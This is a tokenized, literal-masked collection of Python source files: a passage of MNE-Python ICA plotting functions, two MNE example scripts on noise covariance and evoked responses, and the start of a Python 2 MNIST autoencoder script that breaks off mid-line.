<NUM_LIT:0> , <NUM_LIT:1> , len ( unique_labels ) ) ) <EOL> label_colors = dict ( zip ( unique_labels , label_colors ) ) <EOL> else : <EOL> label_colors = dict ( ( k , '<STR_LIT>' ) for k in exclude_labels ) <EOL> for exc_label , ii in zip ( exclude_labels , picks ) : <EOL> if exc_label is not None : <EOL> if '<STR_LIT>' in exc_label : <EOL> key = exc_label . split ( '<STR_LIT>' ) [ <NUM_LIT:1> ] <EOL> else : <EOL> key = exc_label <EOL> color = label_colors [ key ] <EOL> lines . extend ( ax . plot ( times , evoked . data [ ii ] . T , picker = <NUM_LIT> , <EOL> zorder = <NUM_LIT:2> , color = color , label = exc_label ) ) <EOL> else : <EOL> lines . extend ( ax . plot ( times , evoked . data [ ii ] . T , picker = <NUM_LIT> , <EOL> color = '<STR_LIT:k>' , zorder = <NUM_LIT:1> ) ) <EOL> ax . set_title ( title ) <EOL> ax . set_xlim ( times [ [ <NUM_LIT:0> , - <NUM_LIT:1> ] ] ) <EOL> ax . set_xlabel ( '<STR_LIT>' ) <EOL> ax . set_ylabel ( '<STR_LIT>' ) <EOL> if len ( exclude ) > <NUM_LIT:0> : <EOL> plt . legend ( loc = '<STR_LIT>' ) <EOL> tight_layout ( fig = fig ) <EOL> texts . append ( ax . text ( <NUM_LIT:0> , <NUM_LIT:0> , '<STR_LIT:blank>' , zorder = <NUM_LIT:3> , <EOL> verticalalignment = '<STR_LIT>' , <EOL> horizontalalignment = '<STR_LIT:left>' , <EOL> fontweight = '<STR_LIT>' , alpha = <NUM_LIT:0> ) ) <EOL> lines = [ lines ] <EOL> ch_names = evoked . ch_names <EOL> from matplotlib import patheffects <EOL> path_effects = [ patheffects . withStroke ( linewidth = <NUM_LIT:2> , foreground = "<STR_LIT:w>" , <EOL> alpha = <NUM_LIT> ) ] <EOL> params = dict ( axes = axes , texts = texts , lines = lines , idxs = idxs , <EOL> ch_names = ch_names , need_draw = False , <EOL> path_effects = path_effects ) <EOL> fig . canvas . mpl_connect ( '<STR_LIT>' , <EOL> partial ( _butterfly_onpick , params = params ) ) <EOL> fig . canvas . mpl_connect ( '<STR_LIT>' , <EOL> partial ( _butterfly_on_button_press , <EOL> params = params ) ) <EOL> plt_show ( show ) <EOL> return fig <EOL> def plot_ica_scores ( ica , scores , <EOL> exclude = None , labels = None , <EOL> axhline = None , <EOL> title = '<STR_LIT>' , <EOL> figsize = ( <NUM_LIT:12> , <NUM_LIT:6> ) , show = True ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> my_range = np . arange ( ica . n_components_ ) <EOL> if exclude is None : <EOL> exclude = ica . exclude <EOL> exclude = np . unique ( exclude ) <EOL> if not isinstance ( scores [ <NUM_LIT:0> ] , ( list , np . ndarray ) ) : <EOL> scores = [ scores ] <EOL> n_rows = len ( scores ) <EOL> figsize = ( <NUM_LIT:12> , <NUM_LIT:6> ) if figsize is None else figsize <EOL> fig , axes = plt . subplots ( n_rows , figsize = figsize , sharex = True , sharey = True ) <EOL> if isinstance ( axes , np . ndarray ) : <EOL> axes = axes . flatten ( ) <EOL> else : <EOL> axes = [ axes ] <EOL> plt . suptitle ( title ) <EOL> if labels == '<STR_LIT>' : <EOL> labels = [ l for l in ica . labels_ if l . startswith ( '<STR_LIT>' ) ] <EOL> elif labels == '<STR_LIT>' : <EOL> labels = [ l for l in ica . labels_ if l . startswith ( '<STR_LIT>' ) ] <EOL> labels . sort ( key = lambda l : l . split ( '<STR_LIT:/>' ) [ <NUM_LIT:1> ] ) <EOL> elif isinstance ( labels , string_types ) : <EOL> if len ( axes ) > <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' % len ( axes ) ) <EOL> labels = [ labels ] <EOL> elif isinstance ( labels , ( tuple , list ) ) : <EOL> if len ( labels ) != len ( axes ) : <EOL> raise ValueError ( '<STR_LIT>' % len ( axes ) ) <EOL> elif labels is None : <EOL> labels = ( None , None ) <EOL> for label , this_scores , ax in zip ( labels , scores , axes ) : <EOL> if len ( my_range ) != len ( this_scores ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ax . bar ( my_range , this_scores , color = '<STR_LIT:w>' ) <EOL> for excl in exclude : <EOL> ax . bar ( my_range [ excl ] , this_scores [ excl ] , color = '<STR_LIT:r>' ) <EOL> if axhline is not None : <EOL> if np . isscalar ( axhline ) : <EOL> axhline = [ axhline ] <EOL> for axl in axhline : <EOL> ax . axhline ( axl , color = '<STR_LIT:r>' , linestyle = '<STR_LIT>' ) <EOL> ax . set_ylabel ( '<STR_LIT>' ) <EOL> if label is not None : <EOL> if '<STR_LIT>' in label : <EOL> split = label . split ( '<STR_LIT:/>' ) <EOL> label = '<STR_LIT:U+002CU+0020>' . join ( [ split [ <NUM_LIT:0> ] , split [ <NUM_LIT:2> ] ] ) <EOL> elif '<STR_LIT:/>' in label : <EOL> label = '<STR_LIT:U+002CU+0020>' . join ( label . split ( '<STR_LIT:/>' ) ) <EOL> ax . set_title ( '<STR_LIT>' % label ) <EOL> ax . set_xlabel ( '<STR_LIT>' ) <EOL> ax . set_xlim ( <NUM_LIT:0> , len ( this_scores ) ) <EOL> tight_layout ( fig = fig ) <EOL> if len ( axes ) > <NUM_LIT:1> : <EOL> plt . subplots_adjust ( top = <NUM_LIT> ) <EOL> plt_show ( show ) <EOL> return fig <EOL> def plot_ica_overlay ( ica , inst , exclude = None , picks = None , start = None , <EOL> stop = None , title = None , show = True ) : <EOL> """<STR_LIT>""" <EOL> from . . io . base import _BaseRaw <EOL> from . . evoked import Evoked <EOL> from . . preprocessing . ica import _check_start_stop <EOL> if not isinstance ( inst , ( _BaseRaw , Evoked ) ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if title is None : <EOL> title = '<STR_LIT>' <EOL> if picks is None : <EOL> picks = [ inst . ch_names . index ( k ) for k in ica . ch_names ] <EOL> if exclude is None : <EOL> exclude = ica . exclude <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> if start is None : <EOL> start = <NUM_LIT:0.0> <EOL> if stop is None : <EOL> stop = <NUM_LIT> <EOL> ch_types_used = [ k for k in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] if k in ica ] <EOL> start_compare , stop_compare = _check_start_stop ( inst , start , stop ) <EOL> data , times = inst [ picks , start_compare : stop_compare ] <EOL> raw_cln = ica . apply ( inst . copy ( ) , exclude = exclude , <EOL> start = start , stop = stop ) <EOL> data_cln , _ = raw_cln [ picks , start_compare : stop_compare ] <EOL> fig = _plot_ica_overlay_raw ( data = data , data_cln = data_cln , <EOL> times = times * <NUM_LIT> , title = title , <EOL> ch_types_used = ch_types_used , show = show ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> if start is not None and stop is not None : <EOL> inst = inst . copy ( ) . crop ( start , stop ) <EOL> if picks is not None : <EOL> inst . pick_channels ( [ inst . ch_names [ p ] for p in picks ] ) <EOL> evoked_cln = ica . apply ( inst . copy ( ) , exclude = exclude ) <EOL> fig = _plot_ica_overlay_evoked ( evoked = inst , evoked_cln = evoked_cln , <EOL> title = title , show = show ) <EOL> return fig <EOL> def _plot_ica_overlay_raw ( data , data_cln , times , title , ch_types_used , show ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> assert data . shape == data_cln . shape <EOL> fig , ( ax1 , ax2 ) = plt . subplots ( <NUM_LIT:2> , <NUM_LIT:1> , sharex = True ) <EOL> plt . suptitle ( title ) <EOL> ax1 . plot ( times , data . T , color = '<STR_LIT:r>' ) <EOL> ax1 . plot ( times , data_cln . T , color = '<STR_LIT:k>' ) <EOL> ax1 . set_xlabel ( '<STR_LIT>' ) <EOL> ax1 . set_xlim ( times [ <NUM_LIT:0> ] , times [ - <NUM_LIT:1> ] ) <EOL> ax1 . set_xlim ( times [ <NUM_LIT:0> ] , times [ - <NUM_LIT:1> ] ) <EOL> ax1 . set_title ( '<STR_LIT>' ) <EOL> _ch_types = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> ch_types = '<STR_LIT:U+002CU+0020>' . join ( [ _ch_types [ k ] for k in ch_types_used ] ) <EOL> ax2 . set_title ( '<STR_LIT>' . format ( ch_types ) ) <EOL> ax2 . plot ( times , data . mean ( <NUM_LIT:0> ) , color = '<STR_LIT:r>' ) <EOL> ax2 . plot ( times , data_cln . mean ( <NUM_LIT:0> ) , color = '<STR_LIT:k>' ) <EOL> ax2 . set_xlim ( <NUM_LIT:100> , <NUM_LIT> ) <EOL> ax2 . set_xlabel ( '<STR_LIT>' ) <EOL> ax2 . set_xlim ( times [ <NUM_LIT:0> ] , times [ - <NUM_LIT:1> ] ) <EOL> tight_layout ( fig = fig ) <EOL> fig . subplots_adjust ( top = <NUM_LIT> ) <EOL> fig . canvas . draw ( ) <EOL> plt_show ( show ) <EOL> return fig <EOL> def _plot_ica_overlay_evoked ( evoked , evoked_cln , title , show ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> ch_types_used = [ c for c in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] if c in evoked ] <EOL> n_rows = len ( ch_types_used ) <EOL> ch_types_used_cln = [ c for c in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] if <EOL> c in evoked_cln ] <EOL> if len ( ch_types_used ) != len ( ch_types_used_cln ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> fig , axes = plt . subplots ( n_rows , <NUM_LIT:1> ) <EOL> fig . suptitle ( '<STR_LIT>' ) <EOL> axes = axes . flatten ( ) if isinstance ( axes , np . ndarray ) else axes <EOL> evoked . plot ( axes = axes , show = show ) <EOL> for ax in fig . axes : <EOL> for l in ax . get_lines ( ) : <EOL> l . set_color ( '<STR_LIT:r>' ) <EOL> fig . canvas . draw ( ) <EOL> evoked_cln . plot ( axes = axes , show = show ) <EOL> tight_layout ( fig = fig ) <EOL> fig . subplots_adjust ( top = <NUM_LIT> ) <EOL> fig . canvas . draw ( ) <EOL> plt_show ( show ) <EOL> return fig <EOL> def _plot_sources_raw ( ica , raw , picks , exclude , start , stop , show , title , <EOL> block ) : <EOL> """<STR_LIT>""" <EOL> color = _handle_default ( '<STR_LIT>' , ( <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ) ) <EOL> orig_data = ica . _transform_raw ( raw , <NUM_LIT:0> , len ( raw . times ) ) * <NUM_LIT> <EOL> if picks is None : <EOL> picks = range ( len ( orig_data ) ) <EOL> types = [ '<STR_LIT>' for _ in picks ] <EOL> picks = list ( sorted ( picks ) ) <EOL> eog_chs = pick_types ( raw . info , meg = False , eog = True , ref_meg = False ) <EOL> ecg_chs = pick_types ( raw . info , meg = False , ecg = True , ref_meg = False ) <EOL> data = [ orig_data [ pick ] for pick in picks ] <EOL> c_names = [ '<STR_LIT>' % x for x in range ( len ( orig_data ) ) ] <EOL> for eog_idx in eog_chs : <EOL> c_names . append ( raw . ch_names [ eog_idx ] ) <EOL> types . append ( '<STR_LIT>' ) <EOL> for ecg_idx in ecg_chs : <EOL> c_names . append ( raw . ch_names [ ecg_idx ] ) <EOL> types . append ( '<STR_LIT>' ) <EOL> extra_picks = np . append ( eog_chs , ecg_chs ) . astype ( int ) <EOL> if len ( extra_picks ) > <NUM_LIT:0> : <EOL> eog_ecg_data , _ = raw [ extra_picks , : ] <EOL> for idx in range ( len ( eog_ecg_data ) ) : <EOL> if idx < len ( eog_chs ) : <EOL> eog_ecg_data [ idx ] /= <NUM_LIT> <EOL> else : <EOL> eog_ecg_data [ idx ] /= <NUM_LIT> <EOL> data = np . append ( data , eog_ecg_data , axis = <NUM_LIT:0> ) <EOL> for idx in range ( len ( extra_picks ) ) : <EOL> picks = np . append ( picks , ica . n_components_ + idx ) <EOL> if title is None : <EOL> title = '<STR_LIT>' <EOL> info = create_info ( [ c_names [ x ] for x in picks ] , raw . info [ '<STR_LIT>' ] ) <EOL> info [ '<STR_LIT>' ] = [ c_names [ x ] for x in exclude ] <EOL> if start is None : <EOL> start = <NUM_LIT:0> <EOL> if stop is None : <EOL> stop = start + <NUM_LIT:20> <EOL> stop = min ( stop , raw . times [ - <NUM_LIT:1> ] ) <EOL> duration = stop - start <EOL> if duration <= <NUM_LIT:0> : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> t_end = int ( duration * raw . info [ '<STR_LIT>' ] ) <EOL> times = raw . times [ <NUM_LIT:0> : t_end ] <EOL> bad_color = ( <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> ) <EOL> inds = list ( range ( len ( picks ) ) ) <EOL> data = np . array ( data ) <EOL> n_channels = min ( [ <NUM_LIT:20> , len ( picks ) ] ) <EOL> params = dict ( raw = raw , orig_data = data , data = data [ : , <NUM_LIT:0> : t_end ] , <EOL> ch_start = <NUM_LIT:0> , t_start = start , info = info , duration = duration , <EOL> ica = ica , n_channels = n_channels , times = times , types = types , <EOL> n_times = raw . n_times , bad_color = bad_color , picks = picks ) <EOL> _prepare_mne_browse_raw ( params , title , '<STR_LIT:w>' , color , bad_color , inds , <EOL> n_channels ) <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1.0> <EOL> params [ '<STR_LIT>' ] = partial ( _plot_raw_traces , params = params , inds = inds , <EOL> color = color , bad_color = bad_color ) <EOL> params [ '<STR_LIT>' ] = partial ( _update_data , params ) <EOL> params [ '<STR_LIT>' ] = partial ( _pick_bads , params = params ) <EOL> params [ '<STR_LIT>' ] = partial ( _label_clicked , params = params ) <EOL> _layout_figure ( params ) <EOL> callback_key = partial ( _plot_raw_onkey , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . mpl_connect ( '<STR_LIT>' , callback_key ) <EOL> callback_scroll = partial ( _plot_raw_onscroll , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . mpl_connect ( '<STR_LIT>' , callback_scroll ) <EOL> callback_pick = partial ( _mouse_click , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . mpl_connect ( '<STR_LIT>' , callback_pick ) <EOL> callback_resize = partial ( _helper_raw_resize , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . mpl_connect ( '<STR_LIT>' , callback_resize ) <EOL> callback_close = partial ( _close_event , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . mpl_connect ( '<STR_LIT>' , callback_close ) <EOL> params [ '<STR_LIT>' ] = None <EOL> params [ '<STR_LIT>' ] = None <EOL> params [ '<STR_LIT>' ] ( ) <EOL> params [ '<STR_LIT>' ] ( ) <EOL> try : <EOL> plt_show ( show , block = block ) <EOL> except TypeError : <EOL> plt_show ( show ) <EOL> return params [ '<STR_LIT>' ] <EOL> def _update_data ( params ) : <EOL> """<STR_LIT>""" <EOL> sfreq = params [ '<STR_LIT:info>' ] [ '<STR_LIT>' ] <EOL> start = int ( params [ '<STR_LIT>' ] * sfreq ) <EOL> end = int ( ( params [ '<STR_LIT>' ] + params [ '<STR_LIT>' ] ) * sfreq ) <EOL> params [ '<STR_LIT:data>' ] = params [ '<STR_LIT>' ] [ : , start : end ] <EOL> params [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] . times [ start : end ] <EOL> def _pick_bads ( event , params ) : <EOL> """<STR_LIT>""" <EOL> bads = params [ '<STR_LIT:info>' ] [ '<STR_LIT>' ] <EOL> params [ '<STR_LIT:info>' ] [ '<STR_LIT>' ] = _select_bads ( event , params , bads ) <EOL> params [ '<STR_LIT>' ] ( ) <EOL> params [ '<STR_LIT>' ] ( ) <EOL> def _close_event ( events , params ) : <EOL> """<STR_LIT>""" <EOL> info = params [ '<STR_LIT:info>' ] <EOL> c_names = [ '<STR_LIT>' % x for x in range ( params [ '<STR_LIT>' ] . n_components_ ) ] <EOL> exclude = [ c_names . index ( x ) for x in info [ '<STR_LIT>' ] if x . startswith ( '<STR_LIT>' ) ] <EOL> params [ '<STR_LIT>' ] . exclude = exclude <EOL> def _plot_sources_epochs ( ica , epochs , picks , exclude , start , stop , show , <EOL> title , block ) : <EOL> """<STR_LIT>""" <EOL> data = ica . _transform_epochs ( epochs , concatenate = True ) <EOL> eog_chs = pick_types ( epochs . info , meg = False , eog = True , ref_meg = False ) <EOL> ecg_chs = pick_types ( epochs . info , meg = False , ecg = True , ref_meg = False ) <EOL> c_names = [ '<STR_LIT>' % x for x in range ( ica . n_components_ ) ] <EOL> ch_types = np . repeat ( '<STR_LIT>' , ica . n_components_ ) <EOL> for eog_idx in eog_chs : <EOL> c_names . append ( epochs . ch_names [ eog_idx ] ) <EOL> ch_types = np . append ( ch_types , '<STR_LIT>' ) <EOL> for ecg_idx in ecg_chs : <EOL> c_names . append ( epochs . ch_names [ ecg_idx ] ) <EOL> ch_types = np . append ( ch_types , '<STR_LIT>' ) <EOL> extra_picks = np . append ( eog_chs , ecg_chs ) . astype ( int ) <EOL> if len ( extra_picks ) > <NUM_LIT:0> : <EOL> eog_ecg_data = np . concatenate ( epochs . get_data ( ) [ : , extra_picks ] , <EOL> axis = <NUM_LIT:1> ) <EOL> data = np . append ( data , eog_ecg_data , axis = <NUM_LIT:0> ) <EOL> scalings = _handle_default ( '<STR_LIT>' ) <EOL> scalings [ '<STR_LIT>' ] = <NUM_LIT> <EOL> info = create_info ( ch_names = c_names , sfreq = epochs . info [ '<STR_LIT>' ] , <EOL> ch_types = ch_types ) <EOL> info [ '<STR_LIT>' ] = list ( ) <EOL> info [ '<STR_LIT>' ] = [ c_names [ x ] for x in exclude ] <EOL> if title is None : <EOL> title = '<STR_LIT>' <EOL> if picks is None : <EOL> picks = list ( range ( ica . n_components_ ) ) <EOL> if start is None : <EOL> start = <NUM_LIT:0> <EOL> if stop is None : <EOL> stop = start + <NUM_LIT:20> <EOL> stop = min ( stop , len ( epochs . events ) ) <EOL> for idx in range ( len ( extra_picks ) ) : <EOL> picks = np . append ( picks , ica . n_components_ + idx ) <EOL> n_epochs = stop - start <EOL> if n_epochs <= <NUM_LIT:0> : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> params = { '<STR_LIT>' : ica , <EOL> '<STR_LIT>' : epochs , <EOL> '<STR_LIT:info>' : info , <EOL> '<STR_LIT>' : data , <EOL> '<STR_LIT>' : list ( ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> ) , <EOL> '<STR_LIT>' : start * len ( epochs . times ) } <EOL> params [ '<STR_LIT>' ] = partial ( _label_clicked , params = params ) <EOL> _prepare_mne_browse_epochs ( params , projs = list ( ) , n_channels = <NUM_LIT:20> , <EOL> n_epochs = n_epochs , scalings = scalings , <EOL> title = title , picks = picks , <EOL> order = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> params [ '<STR_LIT>' ] = _update_epoch_data <EOL> _update_epoch_data ( params ) <EOL> params [ '<STR_LIT>' ] . set_x ( params [ '<STR_LIT>' ] ) <EOL> callback_close = partial ( _close_epochs_event , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . mpl_connect ( '<STR_LIT>' , callback_close ) <EOL> try : <EOL> plt_show ( show , block = block ) <EOL> except TypeError : <EOL> plt_show ( show ) <EOL> return params [ '<STR_LIT>' ] <EOL> def _update_epoch_data ( params ) : <EOL> """<STR_LIT>""" <EOL> start = params [ '<STR_LIT>' ] <EOL> n_epochs = params [ '<STR_LIT>' ] <EOL> end = start + n_epochs * len ( params [ '<STR_LIT>' ] . times ) <EOL> data = params [ '<STR_LIT>' ] [ : , start : end ] <EOL> types = params [ '<STR_LIT>' ] <EOL> for pick , ind in enumerate ( params [ '<STR_LIT>' ] ) : <EOL> params [ '<STR_LIT:data>' ] [ pick ] = data [ ind ] / params [ '<STR_LIT>' ] [ types [ pick ] ] <EOL> params [ '<STR_LIT>' ] ( ) <EOL> def _close_epochs_event ( events , params ) : <EOL> """<STR_LIT>""" <EOL> info = params [ '<STR_LIT:info>' ] <EOL> exclude = [ info [ '<STR_LIT>' ] . index ( x ) for x in info [ '<STR_LIT>' ] <EOL> if x . startswith ( '<STR_LIT>' ) ] <EOL> params [ '<STR_LIT>' ] . exclude = exclude <EOL> def _label_clicked ( pos , params ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> offsets = np . array ( params [ '<STR_LIT>' ] ) + params [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> line_idx = np . searchsorted ( offsets , pos [ <NUM_LIT:1> ] ) + params [ '<STR_LIT>' ] <EOL> if line_idx >= len ( params [ '<STR_LIT>' ] ) : <EOL> return <EOL> ic_idx = [ params [ '<STR_LIT>' ] [ line_idx ] ] <EOL> types = list ( ) <EOL> info = params [ '<STR_LIT>' ] . info <EOL> if len ( pick_types ( info , meg = False , eeg = True , ref_meg = False ) ) > <NUM_LIT:0> : <EOL> types . append ( '<STR_LIT>' ) <EOL> if len ( pick_types ( info , meg = '<STR_LIT>' , ref_meg = False ) ) > <NUM_LIT:0> : <EOL> types . append ( '<STR_LIT>' ) <EOL> if len ( pick_types ( info , meg = '<STR_LIT>' , ref_meg = False ) ) > <NUM_LIT:0> : <EOL> types . append ( '<STR_LIT>' ) <EOL> ica = params [ '<STR_LIT>' ] <EOL> data = np . dot ( ica . mixing_matrix_ [ : , ic_idx ] . T , <EOL> ica . pca_components_ [ : ica . n_components_ ] ) <EOL> data = np . atleast_2d ( data ) <EOL> fig , axes = _prepare_trellis ( len ( types ) , max_col = <NUM_LIT:3> ) <EOL> for ch_idx , ch_type in enumerate ( types ) : <EOL> try : <EOL> data_picks , pos , merge_grads , _ , _ = _prepare_topo_plot ( ica , <EOL> ch_type , <EOL> None ) <EOL> except Exception as exc : <EOL> warn ( exc ) <EOL> plt . close ( fig ) <EOL> return <EOL> this_data = data [ : , data_picks ] <EOL> ax = axes [ ch_idx ] <EOL> if merge_grads : <EOL> from . . channels . layout import _merge_grad_data <EOL> for ii , data_ in zip ( ic_idx , this_data ) : <EOL> ax . set_title ( '<STR_LIT>' % ii + ch_type , fontsize = <NUM_LIT:12> ) <EOL> data_ = _merge_grad_data ( data_ ) if merge_grads else data_ <EOL> plot_topomap ( data_ . flatten ( ) , pos , axes = ax , show = False ) <EOL> _hide_frame ( ax ) <EOL> tight_layout ( fig = fig ) <EOL> fig . subplots_adjust ( top = <NUM_LIT> ) <EOL> fig . canvas . draw ( ) <EOL> plt_show ( True ) </s>
<s> """<STR_LIT>""" <EOL> import os . path as op <EOL> import mne <EOL> from mne . datasets import sample <EOL> data_path = sample . data_path ( ) <EOL> raw_empty_room_fname = op . join ( <EOL> data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> raw_empty_room = mne . io . read_raw_fif ( raw_empty_room_fname ) <EOL> raw_fname = op . join ( data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> raw = mne . io . read_raw_fif ( raw_fname ) <EOL> raw . info [ '<STR_LIT>' ] += [ '<STR_LIT>' ] <EOL> noise_cov = mne . compute_raw_covariance ( raw_empty_room , tmin = <NUM_LIT:0> , tmax = None ) <EOL> events = mne . find_events ( raw ) <EOL> epochs = mne . Epochs ( raw , events , event_id = <NUM_LIT:1> , tmin = - <NUM_LIT> , tmax = <NUM_LIT:0.0> , <EOL> baseline = ( - <NUM_LIT> , <NUM_LIT:0.0> ) ) <EOL> noise_cov_baseline = mne . compute_covariance ( epochs ) <EOL> noise_cov . plot ( raw_empty_room . info , proj = True ) <EOL> noise_cov_baseline . plot ( epochs . info ) <EOL> cov = mne . compute_covariance ( epochs , tmax = <NUM_LIT:0.> , method = '<STR_LIT>' ) <EOL> evoked = epochs . average ( ) <EOL> evoked . plot_white ( cov ) <EOL> covs = mne . compute_covariance ( epochs , tmax = <NUM_LIT:0.> , method = ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> return_estimators = True ) <EOL> evoked = epochs . average ( ) <EOL> evoked . plot_white ( covs ) </s>
<s> """<STR_LIT>""" <EOL> import os . path as op <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import mne <EOL> data_path = mne . datasets . sample . data_path ( ) <EOL> fname = op . join ( data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> evoked = mne . read_evokeds ( fname , baseline = ( None , <NUM_LIT:0> ) , proj = True ) <EOL> print ( evoked ) <EOL> evoked_l_aud = evoked [ <NUM_LIT:0> ] <EOL> evoked_r_aud = evoked [ <NUM_LIT:1> ] <EOL> evoked_l_vis = evoked [ <NUM_LIT:2> ] <EOL> evoked_r_vis = evoked [ <NUM_LIT:3> ] <EOL> fig = evoked_l_aud . plot ( exclude = ( ) ) <EOL> fig . tight_layout ( ) <EOL> picks = mne . pick_types ( evoked_l_aud . info , meg = True , eeg = False , eog = False ) <EOL> evoked_l_aud . plot ( spatial_colors = True , gfp = True , picks = picks ) <EOL> evoked_l_aud . plot_topomap ( ) <EOL> times = np . arange ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> evoked_r_aud . plot_topomap ( times = times , ch_type = '<STR_LIT>' ) <EOL> evoked_r_aud . plot_topomap ( times = '<STR_LIT>' , ch_type = '<STR_LIT>' ) <EOL> fig , ax = plt . subplots ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> evoked_l_aud . plot_topomap ( times = <NUM_LIT:0.1> , axes = ax [ <NUM_LIT:0> ] , show = False ) <EOL> evoked_r_aud . plot_topomap ( times = <NUM_LIT:0.1> , axes = ax [ <NUM_LIT:1> ] , show = False ) <EOL> evoked_l_vis . plot_topomap ( times = <NUM_LIT:0.1> , axes = ax [ <NUM_LIT:2> ] , show = False ) <EOL> evoked_r_vis . plot_topomap ( times = <NUM_LIT:0.1> , axes = ax [ <NUM_LIT:3> ] , show = True ) <EOL> ts_args = dict ( gfp = True ) <EOL> topomap_args = dict ( sensors = False ) <EOL> evoked_r_aud . plot_joint ( title = '<STR_LIT>' , times = [ <NUM_LIT> , <NUM_LIT> ] , <EOL> ts_args = ts_args , topomap_args = topomap_args ) <EOL> evoked_r_aud . plot_image ( picks = picks ) <EOL> title = '<STR_LIT>' <EOL> evoked_l_aud . plot_topo ( title = title % evoked_l_aud . comment ) <EOL> colors = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> mne . viz . plot_evoked_topo ( evoked , color = colors , <EOL> title = title % '<STR_LIT>' ) <EOL> subjects_dir = data_path + '<STR_LIT>' <EOL> trans_fname = data_path + '<STR_LIT>' <EOL> maps = mne . make_field_map ( evoked_l_aud , trans = trans_fname , subject = '<STR_LIT>' , <EOL> subjects_dir = subjects_dir , n_jobs = <NUM_LIT:1> ) <EOL> field_map = evoked_l_aud . plot_field ( maps , time = <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from backprop2 import Network , sigmoid_vec <EOL> import mnist_loader <EOL> import matplotlib <EOL> import matplotlib . pyplot as plt <EOL> import numpy as np <EOL> SIZE = <NUM_LIT> <EOL> HIDDEN = <NUM_LIT:30> <EOL> print "<STR_LIT>" <EOL> training_data , _ , _ = mnist_loader . load_data_nn ( ) <EOL> td_1 = [ ( x , x ) for x , _ in training_data [ <NUM_LIT:0> : SIZE ] ] <EOL> td_2 = [ ( x , x ) for x , _ in training_data [ <NUM_LIT> : <NUM_LIT> + SIZE ] ] <EOL> td_3 = [ x for x , _ in training_data [ <NUM_LIT> : <NUM_LIT> + SIZE ] ] <EOL> test = [ x for x , _ in training_data [ <NUM_LIT> : <NUM_LIT> + SIZE ] ] <EOL> print "<STR_LIT>" <EOL> ae_1 = Network ( [ <NUM_LIT> , HIDDEN , <NUM_LIT> ] ) <EOL> ae_1 . SGD ( td_1 , <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT> ) <EOL> print "<STR_LIT>" <EOL> ae_2 = Network ( [ <NUM_LIT> , HIDDEN , <NUM_LIT> ] ) <EOL> ae_2 . SGD ( td_1 , <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT> ) <EOL> print "<STR_LIT>" <EOL> encoded_td_1 = [ sigmoid_vec ( np . dot ( ae_1 . weights [ <NUM_LIT:0> ] , x ) + ae_1 . biases [ <NUM_LIT:0> ] ) <EOL> for x in td_3 ] <EOL> encoded_td_2 = [ sigmoid_vec ( np . dot ( ae_2 . weights [ <NUM_LIT:0> ] , x ) + ae_2 . biases [ <NUM_LIT:0> ] ) <EOL> for x in td_3 ] <EOL> encoded_training_data = zip ( encoded_td_1 , encoded_td_2 ) <EOL> print "<STR_LIT>" <EOL> net = Network ( [ HIDDEN , HIDDEN ] ) <EOL> net . SGD ( encoded_training_data , <NUM_LIT:6> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT> ) <EOL> print """<STR_LIT>""" <EOL> print """<STR_LIT>""" <EOL> encoded_test_1 = [ sigmoid_vec ( np . dot ( ae_1 . weights [ <NUM_LIT:0> ] , x ) + ae_1 . biases [ <NUM_LIT:0> ] ) <EOL> for x in test ] <EOL> encoded_test_2 = [ sigmoid_vec ( np . dot ( ae_2 . weights [ <NUM_LIT:0> ] , x ) + ae_2 . biases [ <NUM_LIT:0> ] ) <EOL> for x in test ] <EOL> test_data = zip ( encoded_test_1 , encoded_test_2 ) <EOL> net_baseline = Network ( [ HIDDEN , <NUM_LIT> , HIDDEN ] ) <EOL> net_baseline . biases [ <NUM_LIT:0> ] = ae_1 . biases [ <NUM_LIT:1> ] <EOL> net_baseline . weights [ <NUM_LIT:0> ] = ae_1 . weights [ <NUM_LIT:1> ] <EOL> net_baseline . biases [ 